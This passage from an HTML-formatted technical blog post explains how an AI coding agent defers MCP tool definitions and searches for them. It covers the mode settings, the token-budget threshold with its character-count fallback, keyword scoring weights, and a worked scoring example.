    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Threshold&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;based&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="nx"&gt;defer&lt;/span&gt; &lt;span class="nx"&gt;when&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;exceed&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="nx"&gt;budget&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;auto&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="nx"&gt;or&lt;/span&gt; &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;auto:N&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="nx"&gt;where&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="nx"&gt;N&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;99&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;tst-auto&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Explicit&lt;/span&gt; &lt;span class="nx"&gt;disable&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;falsy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;standard&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;always&lt;/span&gt; &lt;span class="nx"&gt;defer&lt;/span&gt; &lt;span class="nx"&gt;MCP&lt;/span&gt; &lt;span class="nx"&gt;and&lt;/span&gt; &lt;span class="nx"&gt;shouldDefer&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;tst&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The default mode is &lt;code&gt;tst&lt;/code&gt; — always defer. This is the right default because any user with MCP tools has already accepted the latency of an extra search turn in exchange for a larger effective context window. The &lt;code&gt;tst-auto&lt;/code&gt; mode provides a middle ground: defer only when the token cost actually justifies it.&lt;/p&gt;
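&lt;p&gt;Parsing the &lt;code&gt;ENABLE_TOOL_SEARCH&lt;/code&gt; value into a mode can be sketched as follows. The &lt;code&gt;auto:N&lt;/code&gt; handling follows the pseudocode; the exact truthy/falsy spellings and the treatment of an unset variable are assumptions:&lt;/p&gt;

```javascript
// Sketch of value-to-mode mapping (kill switch omitted). Spellings of
// truthy/falsy values are assumptions.
function parseToolSearchValue(value) {
  if (value === undefined) return "tst";        // default: always defer
  if (value === "auto") return "tst-auto";
  const m = /^auto:(\d+)$/.exec(value);
  if (m) {
    const n = Number(m[1]);
    if (n === 0) return "tst";                  // auto:0 means always defer
    if (n >= 1 && n <= 99) return "tst-auto";   // N is the threshold percentage
  }
  if (["1", "true", "yes"].includes(value)) return "tst";
  if (["0", "false", "no"].includes(value)) return "standard";
  return "tst";                                 // anything unrecognized: default
}
```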

&lt;h3&gt;
  
  
  The Threshold Calculation
&lt;/h3&gt;

&lt;p&gt;In &lt;code&gt;tst-auto&lt;/code&gt; mode, the system measures how many tokens the deferred tools would consume and compares against a budget:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;threshold = floor(contextWindow * percentage / 100)
# Default percentage: 10%
# For a 200K context model: threshold = 20,000 tokens
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The token count comes from the API's &lt;code&gt;countTokens&lt;/code&gt; endpoint when available. The system serializes each deferred tool into its API schema (name + description + JSON schema), sends them to the counting endpoint, and caches the result keyed by the tool name set. The cache invalidates when MCP servers connect or disconnect, changing the tool pool.&lt;/p&gt;

&lt;p&gt;There's a subtlety in the counting. The API adds a fixed preamble (~500 tokens) whenever tools are present in a request, so even a single batched count of the deferred schemas includes it once; counting each of N tools in a separate request would inflate that to N × 500 tokens of phantom overhead. The system counts all the deferred tools in one request and subtracts the constant once:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;rawCount&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;countTokensViaAPI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;deferredToolSchemas&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;adjustedCount&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rawCount&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the token counting API is unavailable — perhaps the provider doesn't support it, or the network request fails — the system falls back to a character-based heuristic. It sums the character lengths of each tool's name, description, and serialized input schema, then converts using a ratio of 2.5 characters per token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;charThreshold&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;floor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tokenThreshold&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;2.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;totalChars&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;description&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;
                 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;each&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;enabled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;totalChars&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="nx"&gt;charThreshold&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This heuristic is intentionally conservative. Tool definitions are schema-heavy (lots of short keys and structural characters), which tokenize into more tokens per character than natural language. A 2.5 chars/token ratio therefore slightly overestimates the token count, biasing toward enabling deferral — the safe direction.&lt;/p&gt;
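&lt;p&gt;The fallback heuristic fits in a few lines. The 2.5 chars/token ratio and the 10% default come from the text above; the function shape is illustrative:&lt;/p&gt;

```javascript
// Character-based fallback when the countTokens endpoint is unavailable.
function deferralByCharHeuristic(tools, contextWindow, percentage = 10) {
  const tokenThreshold = Math.floor((contextWindow * percentage) / 100);
  const charThreshold = Math.floor(tokenThreshold * 2.5); // 2.5 chars per token
  const totalChars = tools.reduce(
    (sum, t) =>
      sum + t.name.length + t.description.length + JSON.stringify(t.schema).length,
    0
  );
  return totalChars >= charThreshold; // true: deferral pays for itself
}
```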




&lt;h2&gt;
  
  
  The Search Mechanism
&lt;/h2&gt;

&lt;p&gt;When tool search is enabled, the model sees a &lt;code&gt;ToolSearch&lt;/code&gt; tool in its tool list. The tool accepts a query string and returns up to 5 results (configurable). There are two query modes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Direct Selection
&lt;/h3&gt;

&lt;p&gt;The model can request specific tools by name:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nc"&gt;ToolSearch&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;query&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;select:mcp__github__create_issue&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nc"&gt;ToolSearch&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;query&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;select:Read,Edit,Grep&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;  &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;comma&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;separated&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Direct selection is a lookup, not a search. For each requested name, the system checks the deferred tool pool first, then falls back to the full tool set. Finding a tool in the full set that isn't deferred is a no-op — the tool is already loaded — but returning it prevents the model from retrying in a loop.&lt;/p&gt;

&lt;p&gt;Why does the fallback to the full tool set matter? After context compaction or in subagent conversations, the model sometimes tries to "select" a tool it previously used, not realizing the tool is already loaded (because its earlier search result was summarized away). Without the full-set fallback, the select would fail, the model would get "no matching deferred tools found," and it would waste a turn figuring out the tool is already available. The fallback makes this a silent success.&lt;/p&gt;
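&lt;p&gt;A sketch of the lookup with its full-set fallback (the Map-based pools are illustrative):&lt;/p&gt;

```javascript
// Direct selection is a lookup, not a search: deferred pool first,
// then the full tool set so already-loaded tools resolve silently.
function selectTools(names, deferredPool, fullSet) {
  const found = [];
  const missing = [];
  for (const name of names) {
    const tool = deferredPool.get(name) ?? fullSet.get(name);
    if (tool) found.push(tool);
    else missing.push(name);
  }
  return { found, missing };
}
```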

&lt;h3&gt;
  
  
  Keyword Search
&lt;/h3&gt;

&lt;p&gt;When the model doesn't know the exact tool name, it searches by keyword:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nc"&gt;ToolSearch&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;query&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;slack send message&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nc"&gt;ToolSearch&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;query&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;+github pull request&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;  &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;requires&lt;/span&gt; &lt;span class="nx"&gt;term&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The search algorithm scores each deferred tool against the query terms:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;scoreToolForQuery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;terms&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="nx"&gt;parts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;parseToolName&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;mcp__slack__send_message&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;parts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;slack&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;send&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;message&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;NotebookEdit&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;parts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;notebook&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;edit&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;term&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;terms&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Exact&lt;/span&gt; &lt;span class="nx"&gt;part&lt;/span&gt; &lt;span class="nf"&gt;match &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;highest&lt;/span&gt; &lt;span class="nx"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;term&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;parts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isMcp&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Substring&lt;/span&gt; &lt;span class="nx"&gt;match&lt;/span&gt; &lt;span class="nx"&gt;within&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;part&lt;/span&gt;
        &lt;span class="nx"&gt;elif&lt;/span&gt; &lt;span class="nf"&gt;any&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;term&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;part&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;part&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;parts&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isMcp&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Full&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="nx"&gt;fallback&lt;/span&gt;
        &lt;span class="nx"&gt;elif&lt;/span&gt; &lt;span class="nx"&gt;term&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;fullName&lt;/span&gt; &lt;span class="nx"&gt;and&lt;/span&gt; &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;searchHint&lt;/span&gt; &lt;span class="nf"&gt;match &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;curated&lt;/span&gt; &lt;span class="nx"&gt;capability&lt;/span&gt; &lt;span class="nx"&gt;phrase&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;wordBoundaryMatch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;term&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;searchHint&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Description&lt;/span&gt; &lt;span class="nf"&gt;match &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;lowest&lt;/span&gt; &lt;span class="nx"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;most&lt;/span&gt; &lt;span class="nx"&gt;noise&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;wordBoundaryMatch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;term&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;description&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="nx"&gt;score&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;score&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;MCP tools get slightly higher weight on exact matches (12 vs 10) and substring matches (6 vs 5). This is deliberate: when tool search is active, most deferred tools are MCP tools. Boosting their scores ensures they rank above built-in tools that happen to share terminology.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;searchHint&lt;/code&gt; field is a curated string that tools can provide to improve discoverability. It's weighted above description matches (4 vs 2) because it's intentional signal — a tool author explicitly saying "this tool handles X" — rather than incidental keyword overlap in a long description.&lt;/p&gt;

&lt;p&gt;Description matching uses word-boundary regex (&lt;code&gt;\bterm\b&lt;/code&gt;) to avoid false positives. Without boundaries, a search for "read" would match every tool whose description contains "already", "thread", or "spreadsheet".&lt;/p&gt;
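&lt;p&gt;A minimal sketch of that boundary check (the helper name mirrors the pseudocode's &lt;code&gt;wordBoundaryMatch&lt;/code&gt;; the exact implementation is an assumption):&lt;/p&gt;

```python
import re

def word_boundary_match(term: str, text: str) -> bool:
    # \b anchors the term at word boundaries, so "read" cannot
    # match inside "already", "thread", or "spreadsheet".
    return re.search(r"\b" + re.escape(term) + r"\b", text, re.IGNORECASE) is not None

word_boundary_match("read", "Read a file from disk")   # True
word_boundary_match("read", "already in the thread")   # False
```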

&lt;p&gt;There's also a required-term mechanism. Prefixing a term with &lt;code&gt;+&lt;/code&gt; makes it mandatory: only tools matching ALL required terms in their name, description, or search hint are scored. This lets the model narrow results when a server has many tools: &lt;code&gt;+slack send&lt;/code&gt; finds tools with "slack" in the name AND ranks them by "send" relevance.&lt;/p&gt;
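&lt;p&gt;A sketch of how the &lt;code&gt;+&lt;/code&gt; prefix could be parsed and enforced (function names are illustrative, not the actual implementation):&lt;/p&gt;

```python
def parse_query(query: str):
    """Split a query into required (+-prefixed) and optional terms."""
    required, optional = [], []
    for raw in query.lower().split():
        if raw.startswith("+") and len(raw) > 1:
            required.append(raw[1:])
        else:
            optional.append(raw)
    return required, optional

def passes_required(searchable_text: str, required: list) -> bool:
    """Only tools matching ALL required terms get scored at all."""
    return all(term in searchable_text for term in required)

parse_query("+slack send")  # (["slack"], ["send"])
```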

&lt;h3&gt;
  
  
  A Concrete Scoring Example
&lt;/h3&gt;

&lt;p&gt;Suppose the deferred pool contains these tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mcp__slack__send_message        (MCP)
mcp__slack__list_channels       (MCP)
mcp__github__create_issue       (MCP)
mcp__email__send_email          (MCP)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The model searches: &lt;code&gt;ToolSearch({ query: "slack send" })&lt;/code&gt;. Here's the scoring:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mcp__slack__send_message:
  parts = ["slack", "send", "message"]
  "slack": exact part match, MCP → +12
  "send":  exact part match, MCP → +12
  Total: 24

mcp__slack__list_channels:
  parts = ["slack", "list", "channels"]
  "slack": exact part match, MCP → +12
  "send":  no match in parts, no match in name → +0
  Total: 12

mcp__email__send_email:
  parts = ["email", "send", "email"]
  "slack": no match → +0
  "send":  exact part match, MCP → +12
  Total: 12

mcp__github__create_issue:
  parts = ["github", "create", "issue"]
  "slack": no match → +0
  "send":  no match → +0
  Total: 0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result: &lt;code&gt;["mcp__slack__send_message", "mcp__slack__list_channels", "mcp__email__send_email"]&lt;/code&gt;. The Slack send tool wins, the other Slack tool ties with the email send tool, and the GitHub tool is excluded. Note how multi-term queries naturally boost tools that match on multiple dimensions — a tool matching both "slack" AND "send" scores 24, while one matching only "slack" scores 12.&lt;/p&gt;

&lt;p&gt;The regex patterns are pre-compiled once per search to avoid creating them inside the hot loop (N tools × M terms × 2 checks). Each unique term gets one compiled regex, and all tools share them.&lt;/p&gt;
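&lt;p&gt;The pre-compilation step might look like this (a sketch; the real code is not shown here):&lt;/p&gt;

```python
import re

def compile_term_patterns(terms):
    # One compiled word-boundary regex per unique term, built once
    # per search and shared across every tool in the pool.
    return {t: re.compile(r"\b" + re.escape(t) + r"\b", re.IGNORECASE)
            for t in set(terms)}

patterns = compile_term_patterns(["slack", "send"])
bool(patterns["send"].search("Send a message to a channel"))  # True
```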

&lt;h3&gt;
  
  
  The MCP Prefix Fast Path
&lt;/h3&gt;

&lt;p&gt;When the query starts with &lt;code&gt;mcp__&lt;/code&gt;, the system checks for prefix matches before falling through to keyword search:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="nx"&gt;starts&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;mcp__&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;matches&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;where&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="nx"&gt;starts&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="nx"&gt;query&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;matches&lt;/span&gt; &lt;span class="nx"&gt;found&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;first&lt;/span&gt; &lt;span class="nx"&gt;maxResults&lt;/span&gt; &lt;span class="nx"&gt;matches&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This handles the common pattern where the model knows the server name but not the specific action. Searching &lt;code&gt;mcp__github&lt;/code&gt; returns all GitHub MCP tools without keyword scoring.&lt;/p&gt;
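&lt;p&gt;In runnable form, the fast path is a straightforward prefix filter (a sketch; &lt;code&gt;max_results&lt;/code&gt; is an assumed parameter):&lt;/p&gt;

```python
def prefix_fast_path(query, tool_names, max_results=5):
    # Only engage for queries that already look like MCP tool names.
    if not query.startswith("mcp__"):
        return None
    matches = [name for name in tool_names if name.startswith(query)]
    # Fall through to keyword scoring when nothing matches the prefix.
    return matches[:max_results] if matches else None

tools = ["mcp__github__create_issue", "mcp__github__list_issues",
         "mcp__slack__send_message"]
prefix_fast_path("mcp__github", tools)
# ["mcp__github__create_issue", "mcp__github__list_issues"]
```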

&lt;h3&gt;
  
  
  What Search Returns
&lt;/h3&gt;

&lt;p&gt;The search doesn't return tool definitions. It returns &lt;code&gt;tool_reference&lt;/code&gt; content blocks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
